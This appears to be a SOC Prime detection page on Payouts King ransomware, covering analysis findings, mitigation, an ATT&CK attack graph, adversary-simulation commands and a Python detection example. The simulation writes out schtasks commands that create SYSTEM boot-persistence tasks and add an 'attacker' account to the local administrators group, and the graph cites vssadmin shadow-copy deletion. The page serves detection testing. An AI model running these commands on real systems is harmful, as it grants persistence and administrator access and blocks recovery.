SOC Prime Bias: High

17 Apr 2026 17:40

Payouts King Takes Aim at the Ransomware Throne

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Investigation

ThreatLabz analyzed multiple ransomware samples, reversing the custom CRC and FNV1 hash functions used by the malware and identifying persistence through scheduled tasks. Researchers also documented the encryption scheme, targeted file extensions, and the overall execution flow. Their analysis revealed a built-in list of security-related processes that the ransomware attempts to terminate using low-level system calls before encryption begins. Additional indicators, including command-line parameters and file-extension patterns, were extracted directly from the samples to support detection and hunting efforts.

Mitigation

Organizations should enforce multi-factor authentication, train users to recognize social engineering attempts, and monitor for suspicious use of tools such as Microsoft Teams and Quick Assist. Defenders should also block known ransomware-related file extensions and deploy endpoint detections capable of identifying scheduled task creation under the Mozilla path, as well as calls to SetFileInformationByHandle with FileRenameInfo. Offline backups should be maintained regularly, and shadow copies should be protected to improve recovery options in the event of encryption.

Response

If Payouts King activity is detected, isolate the affected system immediately and collect both volatile memory and disk images for forensic analysis. Investigators should review scheduled tasks for names such as MozillaUpdateTask and MozillaElevateTask, then hunt for the custom CRC-protected command-line arguments and the unique encrypted-file extensions associated with the malware. Recovery should focus on restoring data from verified clean backups. Security teams should also submit the identified sample hashes to relevant threat intelligence platforms to support broader tracking and defense.

Attack Flow

    graph TB
      %% Class definitions
      classDef action fill:#99ccff
      classDef process fill:#ffcc99
      classDef tool fill:#cccccc
      classDef malware fill:#ff9999
      classDef credential fill:#ffccff
      classDef operator fill:#ff9900

      %% Nodes
      action_phishing["<b>Action</b> - <b>T1566.001 Phishing: Spearphishing Attachment</b><br/><b>Description</b>: Email with malicious attachment impersonating IT staff, may use Teams or Quick Assist to convince victim to run file.<br/><b>Technique ID</b>: T1566.001"]
      class action_phishing action
      action_user_exec["<b>Action</b> - <b>T1204.002 User Execution</b><br/><b>Description</b>: Victim opens the malicious file, launching ransomware binary.<br/><b>Technique ID</b>: T1204.002"]
      class action_user_exec action
      tool_malicious_file["<b>Tool</b> - <b>Name</b>: Malicious Payload File<br/><b>Description</b>: Executable delivered via phishing attachment.<br/><b>File Type</b>: .exe or script"]
      class tool_malicious_file tool
      process_cmd_shell["<b>Process</b> - <b>T1059.003 Windows Command Shell</b><br/><b>Description</b>: Ransomware spawns cmd.exe processes via pipe redirection to issue system commands.<br/><b>Technique ID</b>: T1059.003"]
      class process_cmd_shell process
      action_scheduled_task["<b>Action</b> - <b>T1053 Scheduled Task</b><br/><b>Description</b>: Creates a task (e.g., \Mozilla\UpdateTask) to run at system start for persistence.<br/><b>Technique ID</b>: T1053"]
      class action_scheduled_task action
      action_elevate_task["<b>Action</b> - <b>T1546 Event Triggered Execution</b><br/><b>Description</b>: Creates second task (\Mozilla\ElevateTask) that runs ransomware as SYSTEM.<br/><b>Technique ID</b>: T1546"]
      class action_elevate_task action
      defense_obfuscation_dynapi["<b>Defense Evasion</b> - <b>T1027.007 Dynamic API Resolution</b><br/><b>Description</b>: Hashes API names with custom CRC/FNV1 and resolves at runtime.<br/><b>Technique ID</b>: T1027.007"]
      class defense_obfuscation_dynapi malware
      defense_evasion_process_kill["<b>Defense Evasion</b> - <b>T1564.011 Ignore Process Interrupts</b><br/><b>Description</b>: Terminates AV/security processes using direct system calls to bypass hooking.<br/><b>Technique ID</b>: T1564.011"]
      class defense_evasion_process_kill malware
      defense_obfuscation_general["<b>Defense Evasion</b> - <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Uses stack-based string construction and encrypted sections to hide code.<br/><b>Technique ID</b>: T1027"]
      class defense_obfuscation_general malware
      impact_encrypt_files["<b>Impact</b> - <b>T1560.003 Archive via Custom Method</b><br/><b>Description</b>: Encrypts files with per-file AES-256-CTR keys protected by RSA-4096; may encrypt selectively based on size.<br/><b>Technique ID</b>: T1560.003"]
      class impact_encrypt_files malware
      impact_delete_shadows["<b>Impact</b> - <b>T1006 Direct Volume Access</b><br/><b>Description</b>: Executes vssadmin.exe delete shadows /all /quiet to remove volume shadow copies.<br/><b>Technique ID</b>: T1006"]
      class impact_delete_shadows malware
      impact_clear_logs["<b>Impact</b> - <b>T1070.001 Clear Windows Event Logs</b><br/><b>Description</b>: Calls EvtClearLog API to erase event log entries.<br/><b>Technique ID</b>: T1070.001"]
      class impact_clear_logs malware
      credential_private_key["<b>Credential Access</b> - <b>T1552.004 Private Keys</b><br/><b>Description</b>: Embedded RSA private key encrypts AES key material for each encrypted file.<br/><b>Technique ID</b>: T1552.004"]
      class credential_private_key credential

      %% Connections
      action_phishing -->|leads to| action_user_exec
      action_user_exec -->|executes| tool_malicious_file
      tool_malicious_file -->|spawns| process_cmd_shell
      process_cmd_shell -->|creates| action_scheduled_task
      action_scheduled_task -->|creates| action_elevate_task
      action_elevate_task -->|enables| defense_obfuscation_dynapi
      action_elevate_task -->|enables| defense_evasion_process_kill
      action_elevate_task -->|enables| defense_obfuscation_general
      defense_obfuscation_dynapi -->|supports| impact_encrypt_files
      defense_evasion_process_kill -->|supports| impact_encrypt_files
      defense_obfuscation_general -->|supports| impact_encrypt_files
      impact_encrypt_files -->|uses| credential_private_key
      impact_encrypt_files -->|causes| impact_delete_shadows
      impact_encrypt_files -->|causes| impact_clear_logs

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    The attacker, having gained initial access, wants to ensure the ransomware runs on every system reboot and gains SYSTEM privileges. They use the native schtasks.exe binary to avoid introducing third‑party tools. First, they create a “UpdateTask” that runs a dummy ransomware payload, then immediately create and run an “ElevateTask” that spawns a privileged process to further the infection chain. Both tasks are placed under the Mozilla namespace to mimic the known Payouts King pattern.

    1. Create UpdateTask:

      schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:\Temp\payouts_king.exe"
    2. Create ElevateTask:

      schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker"
    3. Execute ElevateTask immediately:

      schtasks.exe /run /tn MozillaElevateTask
    4. (Optional) Verify tasks exist:

      schtasks.exe /query /tn Mozilla* /fo LIST /v

    These exact command lines match the selection1 and selection2 clauses of the Sigma rule, satisfying the condition: selection1 and selection2 and not exclusion.

  • Regression Test Script:

    # Payouts King Scheduled‑Task Persistence Simulation
    # -------------------------------------------------
    # Step 1: Create the UpdateTask (persistence on boot)
    schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:\Temp\payouts_king.exe"
    
    # Step 2: Create the ElevateTask (privilege escalation helper)
    schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker"
    
    # Step 3: Run the ElevateTask immediately to generate the second detection event
    schtasks.exe /run /tn MozillaElevateTask
    
    # Step 4: Output confirmation (not required for detection, for operator visibility)
    Write-Host "Scheduled tasks created and ElevateTask executed."
  • Cleanup Commands:

    # Remove the tasks created for the test
    schtasks.exe /delete /tn MozillaElevateTask /f
    schtasks.exe /delete /tn MozillaUpdateTask /f
    
    # Optionally delete the dummy payload
    Remove-Item -Path "C:\Temp\payouts_king.exe" -ErrorAction SilentlyContinue
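The Sigma condition referenced above (selection1 and selection2 and not exclusion) is not printed on this page, and the Response section asks analysts to hunt for the MozillaUpdateTask and MozillaElevateTask names. The following is an added Python example, not SOC Prime's rule and not ThreatLabz code: it approximates that correlation over a handful of constructed process-creation events so the logic can be checked offline. The event field names (host, image, cmdline), the treatment of selection2 as "ElevateTask created or run", and the exclusion for Firefox's own Default Browser Agent task under the \Mozilla\ folder are all assumptions made for this example; HASH_PLACEHOLDER stands in for the per-install suffix that task name carries.

```python
r"""Toy correlation logic for Payouts King style scheduled-task persistence.

Added example, not SOC Prime's Sigma rule: it approximates the page's
"selection1 and selection2 and not exclusion" condition over constructed
process-creation events. Field names and the exclusion are assumptions.
"""
import re
from collections import defaultdict

# Constructed sample events in a Sysmon Event ID 1 like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART '
                r'/TN MozillaUpdateTask /TR "cmd.exe /c start C:\Temp\payouts_king.exe"'},
    {"host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART '
                r'/TN MozillaElevateTask /TR "cmd.exe /c whoami"'},
    {"host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /run /tn MozillaElevateTask"},
    # Assumed-benign: Firefox's own maintenance task also lives under \Mozilla\.
    {"host": "WS02", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /f /sc DAILY '
                r'/TN "\Mozilla\Firefox Default Browser Agent HASH_PLACEHOLDER" '
                r'/TR "C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task"'},
    # Only half of the pattern: UpdateTask without ElevateTask (must not alert).
    {"host": "WS03", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /sc ONSTART /TN \Mozilla\UpdateTask /TR C:\Temp\x.exe"},
]

# Task name follows /tn (case-insensitive), either quoted or bare.
_TN_RE = re.compile(r'/tn\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def parse_schtasks(cmdline):
    """Return (action, task_name) for a schtasks /create or /run command line, else None."""
    lower = cmdline.lower()
    if "schtasks" not in lower:
        return None
    action = "create" if "/create" in lower else ("run" if "/run" in lower else None)
    match = _TN_RE.search(cmdline)
    if action is None or match is None:
        return None
    return action, (match.group(1) or match.group(2)).strip("\\")


def normalize(task_name):
    r"""Fold folder separators, spaces and case so \Mozilla\UpdateTask == MozillaUpdateTask."""
    return re.sub(r"[\\\s]", "", task_name).lower()


def classify(event):
    """Map one event to the rule clauses it satisfies (empty set if excluded or irrelevant)."""
    parsed = parse_schtasks(event["cmdline"])
    if parsed is None:
        return set()
    action, name = parsed
    norm = normalize(name)
    # Assumed exclusion: Firefox's Default Browser Agent task is dropped before correlation,
    # so a benign Mozilla task on the same host cannot mask a real hit.
    if norm.startswith("mozillafirefoxdefaultbrowseragent"):
        return set()
    clauses = set()
    if action == "create" and norm == "mozillaupdatetask":
        clauses.add("selection1")
    if norm == "mozillaelevatetask":  # created or run
        clauses.add("selection2")
    return clauses


def evaluate(events):
    """Return hosts on which both selection1 and selection2 fired (exclusions already dropped)."""
    per_host = defaultdict(set)
    for event in events:
        per_host[event["host"]] |= classify(event)
    return sorted(host for host, clauses in per_host.items()
                  if {"selection1", "selection2"} <= clauses)


if __name__ == "__main__":
    for host in evaluate(SAMPLE_EVENTS):
        print(f"ALERT {host}: Payouts King style Mozilla task persistence")
```

Two design points carry over to a production rule. The task name is normalized before comparison because the graph on this page writes the tasks as folder paths (\Mozilla\UpdateTask) while the simulation above creates them as flat names (MozillaUpdateTask), and both spellings should match. The exclusion is applied per event, not per host, so a legitimate Firefox task on a machine does not suppress an alert for the malicious pair on that same machine.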